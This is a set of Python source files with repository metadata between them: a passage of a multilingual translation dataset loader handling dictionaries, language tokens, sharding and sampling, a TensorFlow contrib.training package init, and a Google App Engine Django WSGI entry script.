logger.info("[{}] dictionary: {} types".format(lang, len(dicts[lang])))
if args.fixed_dictionary is not None:
fixed_dict = load_dictionary(args.fixed_dictionary)
dicts = {lang: fixed_dict for lang in src_langs_to_load_dicts + tgt_langs_to_load_dicts}
else:
if args.source_dict is None:
load_dicts(src_langs_to_load_dicts)
if args.target_dict is None:
load_dicts(tgt_langs_to_load_dicts)
return dicts
def get_source_dictionary(self, lang):
if self.args.source_dict is not None:
return self.dicts[SRC_DICT_NAME]
else:
return self.dicts[lang]
def get_target_dictionary(self, lang):
if self.args.target_dict is not None:
return self.dicts[TGT_DICT_NAME]
else:
return self.dicts[lang]
@classmethod
def create_lang_dictionary(cls, langs):
unk = "<unk>"
# hack to remove symbols other than unk as they are not needed by lang dict
lang_dict = Dictionary(pad=unk, eos=unk, unk=unk, bos=unk)
for lang in langs:
lang_dict.add_symbol(lang)
return lang_dict
@classmethod
def get_langtok_index(cls, lang_tok, dic):
idx = dic.index(lang_tok)
assert (
idx != dic.unk_index
), "cannot find language token {} in the dictionary".format(lang_tok)
return idx
def get_encoder_langtok(self, src_lang, tgt_lang, spec=None):
if spec is None:
return None
if spec and spec.startswith("src"):
if src_lang is None:
return None
langtok = get_lang_tok(
lang=src_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
else:
if tgt_lang is None:
return None
langtok = get_lang_tok(
lang=tgt_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
return self.get_langtok_index(
langtok, self.get_source_dictionary(src_lang) if src_lang else self.get_target_dictionary(tgt_lang)
)
def get_decoder_langtok(self, tgt_lang, spec=None):
if spec is None:
return None
langtok = get_lang_tok(
lang=tgt_lang, lang_tok_style=self.args.lang_tok_style, spec=spec
)
return self.get_langtok_index(langtok, self.get_target_dictionary(tgt_lang))
@classmethod
def load_data(cls, path, vdict, impl):
dataset = data_utils.load_indexed_dataset(path, vdict, impl)
return dataset
@classmethod
def split_exists(cls, split, src, tgt, lang, data_path, dataset_impl):
filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
return indexed_dataset.dataset_exists(filename, impl=dataset_impl)
def load_lang_dataset(
self,
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
max_source_positions,
prepend_bos=False,
load_alignments=False,
truncate_source=False,
):
src_datasets = []
tgt_datasets = []
for k in itertools.count():
split_k = split + (str(k) if k > 0 else "")
# infer langcode
if self.split_exists(split_k, src, tgt, src, data_path, dataset_impl):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
elif self.split_exists(split_k, tgt, src, src, data_path, dataset_impl):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
else:
if k > 0:
break
else:
logger.error(
f"Dataset not found: {data_path}, {split_k}, {src}, {tgt}"
)
raise FileNotFoundError(
"Dataset not found: {} ({})".format(split, data_path)
)
src_dataset = self.load_data(prefix + src, src_dict, dataset_impl)
if truncate_source:
src_dataset = AppendTokenDataset(
TruncateDataset(
StripTokenDataset(src_dataset, src_dict.eos()),
max_source_positions - 1,
),
src_dict.eos(),
)
src_datasets.append(src_dataset)
tgt_datasets.append(self.load_data(prefix + tgt, tgt_dict, dataset_impl))
logger.info(
"{} {} {}-{} {} examples".format(
data_path, split_k, src, tgt, len(src_datasets[-1])
)
)
if not combine:
break
assert len(src_datasets) == len(tgt_datasets)
if len(src_datasets) == 1:
src_dataset, tgt_dataset = src_datasets[0], tgt_datasets[0]
else:
sample_ratios = [1] * len(src_datasets)
sample_ratios[0] = upsample_primary
src_dataset = ConcatDataset(src_datasets, sample_ratios)
tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
if prepend_bos:
assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
align_dataset = None
if load_alignments:
align_path = os.path.join(
data_path, "{}.align.{}-{}".format(split, src, tgt)
)
if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
align_dataset = data_utils.load_indexed_dataset(
align_path, None, dataset_impl
)
return src_dataset, tgt_dataset, align_dataset
def load_langpair_dataset(
self,
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
left_pad_source,
left_pad_target,
max_source_positions,
max_target_positions,
prepend_bos=False,
load_alignments=False,
truncate_source=False,
src_dataset_transform_func=lambda dataset: dataset,
tgt_dataset_transform_func=lambda dataset: dataset,
src_lang_id=None,
tgt_lang_id=None,
langpairs_sharing_datasets=None,
src_prefixes=None,
tgt_prefixes=None,
):
norm_direction = "-".join(sorted([src, tgt]))
if langpairs_sharing_datasets is not None:
src_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, src), "NotInCache"
)
tgt_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, tgt), "NotInCache"
)
align_dataset = langpairs_sharing_datasets.get(
(data_path, split, norm_direction, src, tgt), "NotInCache"
)
# a hack: any one is not in cache, we need to reload them
if (
langpairs_sharing_datasets is None
or src_dataset == "NotInCache"
or tgt_dataset == "NotInCache"
or align_dataset == "NotInCache"
or split != getattr(self.args, "train_subset", None)
):
# source and target datasets can be reused in reversed directions to save memory
# reversed directions of valid and test data will not share source and target datasets
src_dataset, tgt_dataset, align_dataset = self.load_lang_dataset(
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
max_source_positions=max_source_positions,
prepend_bos=prepend_bos,
load_alignments=load_alignments,
truncate_source=truncate_source,
)
src_dataset = src_dataset_transform_func(src_dataset)
tgt_dataset = tgt_dataset_transform_func(tgt_dataset)
if src_prefixes is not None:
src_dataset = PrefixTokenDataset(src_dataset, src_prefixes)
if tgt_prefixes is not None:
if tgt_dataset is not None:
tgt_dataset = PrefixTokenDataset(tgt_dataset, tgt_prefixes)
if langpairs_sharing_datasets is not None:
langpairs_sharing_datasets[
(data_path, split, norm_direction, src)
] = src_dataset
langpairs_sharing_datasets[
(data_path, split, norm_direction, tgt)
] = tgt_dataset
langpairs_sharing_datasets[
(data_path, split, norm_direction, src, tgt)
] = align_dataset
if align_dataset is None:
# no align data so flag the reverse direction as well in sharing
langpairs_sharing_datasets[
(data_path, split, norm_direction, tgt, src)
] = align_dataset
else:
logger.info(
f"Reusing source and target datasets of [{split}] {tgt}-{src} for reversed direction: "
f"[{split}] {src}-{tgt}: src length={len(src_dataset)}; tgt length={len(tgt_dataset)}"
)
return LanguagePairDataset(
src_dataset,
src_dataset.sizes,
src_dict,
tgt_dataset,
tgt_dataset.sizes if tgt_dataset is not None else None,
tgt_dict,
left_pad_source=left_pad_source,
left_pad_target=left_pad_target,
align_dataset=align_dataset,
src_lang_id=src_lang_id,
tgt_lang_id=tgt_lang_id,
tgt_prefixes=tgt_prefixes
)
def src_dataset_tranform_func(self, src_lang, tgt_lang, dataset, spec=None):
if self.args.lang_tok_replacing_bos_eos:
# it is handled by self.alter_dataset_langtok
# TODO: Unify with alter_dataset_langtok
return dataset
if spec is None:
return dataset
tok = self.get_encoder_langtok(src_lang, tgt_lang, spec)
if tok:
return PrependTokenDataset(dataset, tok)
return dataset
def tgt_dataset_tranform_func(self, source_lang, target_lang, dataset, spec=None):
if dataset is None:
# note that target dataset can be None during inference time
return None
if self.args.lang_tok_replacing_bos_eos:
# TODO: Unify with alter_dataset_langtok
# It is handled by self.alter_dataset_langtok.
# The complication in self.alter_dataset_langtok
# makes a unified framework difficult.
return dataset
# if not self.args.decoder_langtok:
if not spec:
return dataset
tok = self.get_decoder_langtok(target_lang, spec)
if tok:
return PrependTokenDataset(dataset, tok)
return dataset
def alter_dataset_langtok(
self,
lang_pair_dataset,
src_eos=None,
src_lang=None,
tgt_eos=None,
tgt_lang=None,
src_langtok_spec=None,
tgt_langtok_spec=None,
):
if src_langtok_spec is None and tgt_langtok_spec is None:
return lang_pair_dataset
new_src_eos = None
if (
src_langtok_spec is not None
and src_eos is not None
and (src_lang is not None or tgt_lang is not None)
):
new_src_eos = self.get_encoder_langtok(src_lang, tgt_lang, src_langtok_spec)
else:
src_eos = None
new_tgt_bos = None
if tgt_langtok_spec and tgt_eos is not None and tgt_lang is not None:
new_tgt_bos = self.get_decoder_langtok(tgt_lang, tgt_langtok_spec)
else:
tgt_eos = None
return TransformEosLangPairDataset(
lang_pair_dataset,
src_eos=src_eos,
new_src_eos=new_src_eos,
tgt_bos=tgt_eos,
new_tgt_bos=new_tgt_bos,
)
def load_a_dataset(
self,
split,
data_path,
src,
src_dict,
tgt,
tgt_dict,
combine,
prepend_bos=False,
langpairs_sharing_datasets=None,
data_category=None,
src_prefixes=None,
tgt_prefixes=None,
**extra_kwargs,
):
dataset_impl = self.args.dataset_impl
upsample_primary = self.args.upsample_primary
left_pad_source = self.args.left_pad_source
left_pad_target = self.args.left_pad_target
max_source_positions = self.args.max_source_positions
max_target_positions = self.args.max_target_positions
load_alignments = self.args.load_alignments
truncate_source = self.args.truncate_source
src_dataset_transform_func = self.src_dataset_tranform_func
tgt_dataset_transform_func = self.tgt_dataset_tranform_func
enable_lang_ids = self.args.enable_lang_ids
lang_dictionary = self.lang_dict
src_langtok_spec, tgt_langtok_spec = extra_kwargs["langtok_spec"]
src_langtok = self.get_encoder_langtok(src, tgt, src_langtok_spec)
tgt_langtok = self.get_decoder_langtok(tgt, tgt_langtok_spec)
logger.info(
f"{data_category}:{src}-{tgt} src_langtok: {src_langtok}; tgt_langtok: {tgt_langtok}"
)
langpair_ds = self.load_langpair_dataset(
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
combine,
dataset_impl,
upsample_primary,
left_pad_source,
left_pad_target,
max_source_positions,
max_target_positions,
prepend_bos,
load_alignments,
truncate_source,
src_dataset_transform_func=lambda dataset: src_dataset_transform_func(
src, tgt, dataset, src_langtok_spec
),
tgt_dataset_transform_func=lambda dataset: tgt_dataset_transform_func(
src, tgt, dataset, tgt_langtok_spec
),
src_lang_id=_lang_id(lang_dictionary, src)
if enable_lang_ids and lang_dictionary is not None
else None,
tgt_lang_id=_lang_id(lang_dictionary, tgt)
if enable_lang_ids and lang_dictionary is not None
else None,
langpairs_sharing_datasets=langpairs_sharing_datasets,
src_prefixes=src_prefixes,
tgt_prefixes=tgt_prefixes,
)
# TODO: handle modified lang toks for mined data and dae data
if self.args.lang_tok_replacing_bos_eos:
ds = self.alter_dataset_langtok(
langpair_ds,
src_eos=self.get_source_dictionary(src).eos() if src else self.get_target_dictionary(tgt).eos(),
src_lang=src,
tgt_eos=self.get_target_dictionary(tgt).eos(),
tgt_lang=tgt,
src_langtok_spec=src_langtok_spec,
tgt_langtok_spec=tgt_langtok_spec,
)
else:
ds = langpair_ds
return ds
def load_split_langpair_datasets(self, split, data_param_list):
datasets = []
langpairs_sharing_datasets = (
{} if self.args.enable_reservsed_directions_shared_datasets else None
)
for param in data_param_list:
ds = self.load_a_dataset(
split=split,
langpairs_sharing_datasets=langpairs_sharing_datasets,
**param,
)
datasets.append(ds)
return datasets
def get_data_paths_and_lang_pairs(self, split):
datapaths = {"main": self.args.data}
lang_pairs = {"main": self.lang_pairs}
if split == getattr(self.args, "train_subset", None):
# only training data can have extra data and extra language pairs
if self.args.extra_data:
extra_datapaths = self.args.extra_data
datapaths.update(extra_datapaths)
if self.args.extra_lang_pairs:
extra_lang_pairs = {
k: v.split(",") for k, v in self.args.extra_lang_pairs.items()
}
lang_pairs.update(extra_lang_pairs)
return datapaths, lang_pairs
@classmethod
def get_dataset_key(cls, data_category, src, tgt):
return f"{data_category}:{src}-{tgt}"
@classmethod
def _get_shard_num_dict(cls, split, paths):
shards = defaultdict(int)
for path in paths:
files = PathManager.ls(path)
directions = set()
for f in files:
if f.startswith(split) and f.endswith(".idx"):
# idx files of the form "{split}.{src}-{tgt}.{lang}.idx"
direction = f.split(".")[-3]
directions.add(direction)
for direction in directions:
shards[direction] += 1
return shards
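    # Compute and cache the number of shards for every dataset key of this
    # split, falling back to the reversed direction if only that is on disk.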
def get_split_num_data_shards(self, split):
if split in self._num_shards_dict:
return self._num_shards_dict[split]
num_shards_dict = {}
data_paths, lang_pairs = self.get_data_paths_and_lang_pairs(split)
for data_category, paths in data_paths.items():
if data_category not in lang_pairs:
continue
paths = utils.split_paths(paths)
shards_dict = self._get_shard_num_dict(split, paths)
lang_dirs = [
lang_pair.split("-") for lang_pair in lang_pairs[data_category]
]
lang_dirs = [x if len(x) > 1 else (x[0], x[0]) for x in lang_dirs]
for src, tgt in lang_dirs:
key = self.get_dataset_key(data_category, src, tgt)
if "mono_" in data_category:
# monolingual data requires tgt only
                    assert src is None or src == tgt, (
                        f"error: src={src}, "
                        f"tgt={tgt} for data_category={data_category}"
)
num_shards_dict[key] = shards_dict[tgt]
else:
if f"{src}-{tgt}" in shards_dict:
num_shards_dict[key] = shards_dict[f"{src}-{tgt}"]
elif f"{tgt}-{src}" in shards_dict:
# follow the fairseq tradition to use reversed direction data if it is not available
num_shards_dict[key] = shards_dict[f"{tgt}-{src}"]
self._num_shards_dict[split] = num_shards_dict
logger.info(f"[{split}] num of shards: {num_shards_dict}")
return num_shards_dict
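    # Shards are cycled round-robin over epochs, e.g. with num_shards=3,
    # epochs 1, 2, 3, 4 map to shards 0, 1, 2, 0.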
@classmethod
def get_shard_id(cls, num_shards, epoch, shard_epoch=None):
shard = epoch if shard_epoch is None else shard_epoch
shard = (shard - 1) % num_shards
return shard
def get_split_data_path(self, paths, epoch, shard_epoch, num_shards):
path = paths[self.get_shard_id(num_shards, epoch, shard_epoch)]
return path
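    # Build one parameter dict per (data_category, src, tgt): dictionaries,
    # language-token spec, and the shard-specific data path for this epoch.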
def get_split_data_param_list(self, split, epoch, shard_epoch=None):
# TODO: to extend with extra datasets and keys and loop over different shard data paths
param_list = []
data_paths, lang_pairs = self.get_data_paths_and_lang_pairs(split)
logger.info(f"langtoks settings: {self.args.langtoks}")
split_num_shards_dict = self.get_split_num_data_shards(split)
for data_category, paths in data_paths.items():
if data_category not in lang_pairs:
continue
paths = utils.split_paths(paths)
assert len(paths) > 0
if len(paths) > 1:
self._has_sharded_data = True
if split != getattr(self.args, "train_subset", None):
# if not training data set, use the first shard for valid and test
paths = paths[:1]
if data_category in self.args.langtoks:
lang_tok_spec = self.args.langtoks[data_category]
else:
# default to None
lang_tok_spec = (None, None)
# infer langcode
lang_dirs = [
lang_pair.split("-") for lang_pair in lang_pairs[data_category]
]
lang_dirs = [x if len(x) > 1 else (x[0], x[0]) for x in lang_dirs]
for src, tgt in lang_dirs:
                assert src is not None or data_category == "mono_dae", (
                    f"error: src={src}, " f"tgt={tgt} for data_category={data_category}"
)
# logger.info(f"preparing param for {data_category}: {src} - {tgt}")
key = self.get_dataset_key(data_category, src, tgt)
data_path = self.get_split_data_path(
paths, epoch, shard_epoch, split_num_shards_dict[key]
)
param_list.append(
{
"key": key,
"data_path": data_path,
"split": split,
"src": src,
"src_dict": self.get_source_dictionary(src)
if src and data_category != "mono_dae"
else None,
"tgt": tgt,
"tgt_dict": self.get_target_dictionary(tgt),
"data_category": data_category,
"langtok_spec": lang_tok_spec,
}
)
return param_list
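    # Estimate the total size of each dataset across all of its shards, using
    # the largest shard seen so far to approximate shards not yet loaded.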
def get_train_dataset_sizes(
self, data_param_list, datasets, epoch, shard_epoch=None
):
num_shards = [
self.get_split_num_data_shards(param["split"])[param["key"]]
for param in data_param_list
]
data_sizes = []
for (key, d), num_shard in zip(datasets, num_shards):
my_data_sizes = self._training_data_sizes[key]
shard_ind = self.get_shard_id(num_shard, epoch, shard_epoch)
if shard_ind not in my_data_sizes:
my_data_sizes[shard_ind] = len(d)
known_size = max(my_data_sizes.values())
data_sizes.append(
                # If we don't know the data size of the shard yet,
                # use the max known data size to approximate.
                # Note that we preprocess shards by a designated shard size
                # and put any remaining data at the end into the last shard, so
                # the max shard size approximation is almost correct before loading
                # the last shard; after loading the last shard, we will have the
                # exact data sizes of the whole dataset.
(key, sum(my_data_sizes.get(i, known_size) for i in range(num_shard)))
)
logger.info(
f"estimated total data sizes of all shards used in sampling ratios: {data_sizes}. "
"Note that if the data a shard has not been loaded yet, use the max known data size to approximate"
)
return [s for _, s in data_sizes]
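    # Turn the estimated dataset sizes into sampling ratios using the
    # configured sampling method (None means no resampling).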
def get_train_sampling_ratios(
self, data_param_list, datasets, epoch=1, shard_epoch=None
):
data_sizes = self.get_train_dataset_sizes(
data_param_list, datasets, epoch, shard_epoch
)
sampling_func = self.sampling_method.sampling_method_selector()
sample_ratios = sampling_func(data_sizes) if sampling_func is not None else None
return sample_ratios
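    # Resolve sampling ratios: per-key weights from a file take precedence,
    # then explicit --sampling-weights, otherwise size-based training ratios.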
def get_sampling_ratios(self, data_param_list, datasets, epoch, shard_epoch=None):
if self.args.sampling_weights_from_file:
weights = load_sampling_weights(self.args.sampling_weights_from_file)
sample_ratios = [weights[k] for k, _ in datasets]
logger.info(
"| ignoring --sampling-weights when loadding sampling weights "
f"from file {self.args.sampling_weights_from_file}"
)
elif self.args.sampling_weights:
sample_ratios = [self.args.sampling_weights[k] for k, _ in datasets]
else:
sample_ratios = self.get_train_sampling_ratios(
data_param_list, datasets, epoch, shard_epoch
)
if sample_ratios is not None:
logger.info(
"| Upsample ratios: {}".format(
list(zip(map(lambda x: x["key"], data_param_list), sample_ratios))
)
)
assert len(sample_ratios) == len(datasets)
return sample_ratios
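    # Load all datasets of a split and return (key, dataset) pairs together
    # with the parameter list used to build them.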
def load_split_datasets(
self, split, training, epoch=1, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
data_param_list = self.get_split_data_param_list(
split, epoch, shard_epoch=shard_epoch
)
langpairs_sharing_datasets = (
{} if self.args.enable_reservsed_directions_shared_datasets else None
)
datasets = [
(
param["key"],
self.load_a_dataset(
combine=combine,
langpairs_sharing_datasets=langpairs_sharing_datasets,
src_prefixes=src_prefixes,
tgt_prefixes=tgt_prefixes,
**param,
),
)
for param in data_param_list
]
return datasets, data_param_list
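    # Concatenate the per-pair datasets (used for valid/test); when lang-tok
    # BOS/EOS replacement is on, wrap them in a SampledMultiDataset instead,
    # since TransformEosLangPairDataset does not work with ConcatDataset.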
def load_into_concat_dataset(self, split, datasets, data_param_list):
if self.args.lang_tok_replacing_bos_eos:
# TODO: to investigate why TransformEosLangPairDataset doesn't work with ConcatDataset
return SampledMultiDataset(
OrderedDict(datasets),
sampling_ratios=None,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=None,
split=split,
)
return ConcatDataset([d for _, d in datasets])
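    # Training split: resample across datasets inside virtual epochs of size
    # args.virtual_epoch_size; valid/test splits fall back to concatenation.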
def load_sampled_multi_epoch_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
datasets, data_param_list = self.load_split_datasets(
split, training, epoch, combine, shard_epoch=shard_epoch,
src_prefixes=src_prefixes, tgt_prefixes=tgt_prefixes, **kwargs
)
if training and split == getattr(self.args, "train_subset", None):
sample_ratios = self.get_sampling_ratios(data_param_list, datasets, epoch)
return SampledMultiEpochDataset(
OrderedDict(datasets),
epoch=epoch,
shard_epoch=shard_epoch,
                # valid and test datasets will degenerate to concatenated datasets:
sampling_ratios=sample_ratios,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=self.args.virtual_data_size,
split=split,
virtual_epoch_size=self.args.virtual_epoch_size,
                # if not using lang_tok altering, simplify to share the same collater
shared_collater=self._shared_collater(),
)
else:
return self.load_into_concat_dataset(split, datasets, data_param_list)
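    # Same as above but without virtual epochs: a single SampledMultiDataset
    # over the whole virtual data size.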
def load_sampled_multi_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
datasets, data_param_list = self.load_split_datasets(
split, training, epoch, combine, shard_epoch=shard_epoch,
src_prefixes=src_prefixes, tgt_prefixes=tgt_prefixes, **kwargs
)
if training and split == getattr(self.args, "train_subset", None):
sample_ratios = self.get_sampling_ratios(data_param_list, datasets, epoch)
return SampledMultiDataset(
OrderedDict(datasets),
epoch=epoch,
                # valid and test datasets will degenerate to concatenated datasets:
sampling_ratios=sample_ratios,
eval_key=None,
collate_format=CollateFormat.single,
virtual_size=self.args.virtual_data_size,
split=split,
                # if not using lang_tok altering, simplify to share the same collater
shared_collater=self._shared_collater(),
)
else:
return self.load_into_concat_dataset(split, datasets, data_param_list)
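    # Dispatch on args.virtual_epoch_size: use the virtual-epoch variant only
    # when it is set.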
def load_dataset(
self, split, training, epoch=0, combine=False, shard_epoch=None,
src_prefixes=None, tgt_prefixes=None, **kwargs
):
if self.args.virtual_epoch_size is None:
return self.load_sampled_multi_dataset(
split, training, epoch, combine, shard_epoch,
src_prefixes, tgt_prefixes, **kwargs
)
else:
return self.load_sampled_multi_epoch_dataset(
split, training, epoch, combine, shard_epoch,
src_prefixes, tgt_prefixes, **kwargs
)
| 39.40968
| 124
| 0.578042
|
cc1a6301ec39e8ec211d53d7903565ef8684873e
| 3,454
|
py
|
Python
|
tensorflow/contrib/training/__init__.py
|
shaulr/tensorflow
|
27a98083a6c16f263d668271889863596efbeb84
|
[
"Apache-2.0"
] | 2
|
2020-05-04T03:59:25.000Z
|
2021-07-16T03:09:22.000Z
|
tensorflow/contrib/training/__init__.py
|
amineferchichi/tensorflow
|
4ac9c09d5ca57a03b8daa5fb9e295947b1619854
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/training/__init__.py
|
amineferchichi/tensorflow
|
4ac9c09d5ca57a03b8daa5fb9e295947b1619854
|
[
"Apache-2.0"
] | 1
|
2022-01-22T05:39:49.000Z
|
2022-01-22T05:39:49.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training and input utilities. See @{$python/contrib.training} guide.
@@batch_sequences_with_states
@@NextQueuedSequenceBatch
@@SequenceQueueingStateSaver
@@rejection_sample
@@resample_at_rate
@@stratified_sample
@@weighted_resample
@@bucket
@@bucket_by_sequence_length
@@GreedyLoadBalancingStrategy
@@byte_size_load_fn
@@FailureTolerator
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.training.python.training.bucket_ops import *
from tensorflow.contrib.training.python.training.device_setter import *
from tensorflow.contrib.training.python.training.evaluation import checkpoints_iterator
from tensorflow.contrib.training.python.training.evaluation import evaluate_once
from tensorflow.contrib.training.python.training.evaluation import evaluate_repeatedly
from tensorflow.contrib.training.python.training.evaluation import get_or_create_eval_step
from tensorflow.contrib.training.python.training.evaluation import StopAfterNEvalsHook
from tensorflow.contrib.training.python.training.evaluation import SummaryAtEndHook
from tensorflow.contrib.training.python.training.evaluation import wait_for_new_checkpoint
from tensorflow.contrib.training.python.training.failure_tolerator import *
from tensorflow.contrib.training.python.training.feeder import *
from tensorflow.contrib.training.python.training.resample import *
from tensorflow.contrib.training.python.training.sampling_ops import *
from tensorflow.contrib.training.python.training.sequence_queueing_state_saver import *
from tensorflow.contrib.training.python.training.training import add_gradients_summaries
from tensorflow.contrib.training.python.training.training import clip_gradient_norms
from tensorflow.contrib.training.python.training.training import create_train_op
from tensorflow.contrib.training.python.training.training import multiply_gradients
from tensorflow.contrib.training.python.training.training import train
from tensorflow.contrib.training.python.training.tuner import Tuner
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
# Allow explicitly imported symbols. Symbols imported with * must also be
# whitelisted here or in the module docstring above.
_allowed_symbols = [
'checkpoints_iterator', 'evaluate_once', 'evaluate_repeatedly',
'get_or_create_eval_step', 'StopAfterNEvalsHook', 'SummaryAtEndHook',
'wait_for_new_checkpoint', 'add_gradients_summaries', 'clip_gradient_norms',
'create_train_op', 'multiply_gradients', 'train']
remove_undocumented(__name__, _allowed_symbols)
| 47.315068
| 90
| 0.819629
|
f118a84e8a92532d986fee0db8524cfe8653b87f
| 1,180
|
py
|
Python
|
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | 1
|
2016-05-08T18:55:44.000Z
|
2016-05-08T18:55:44.000Z
|
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | null | null | null |
legacy_code/main.py
|
rmalik/dspillini
|
1975043075198192396970e62284179d7a6c7098
|
[
"Apache-2.0"
] | null | null | null |
import logging, os, sys
# Google App Engine imports.
from google.appengine.ext.webapp import util
# Remove the standard version of Django.
for k in [k for k in sys.modules if k.startswith('django')]:
del sys.modules[k]
# Force sys.path to have our own directory first, in case we want to import
# from it.
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
# Must set this env var *before* importing any part of Django
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
import django.core.signals
import django.db
import django.dispatch.dispatcher
def log_exception(*args, **kwds):
logging.exception('Exception in request:')
# Log errors.
django.core.signals.got_request_exception.connect(log_exception)
# Unregister the rollback event handler.
django.core.signals.got_request_exception.disconnect(
    django.db._rollback_on_exception)
def main():
# Create a Django application for WSGI.
application = django.core.handlers.wsgi.WSGIHandler()
# Run the WSGI CGI handler with that application.
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
| 26.818182
| 75
| 0.761017
|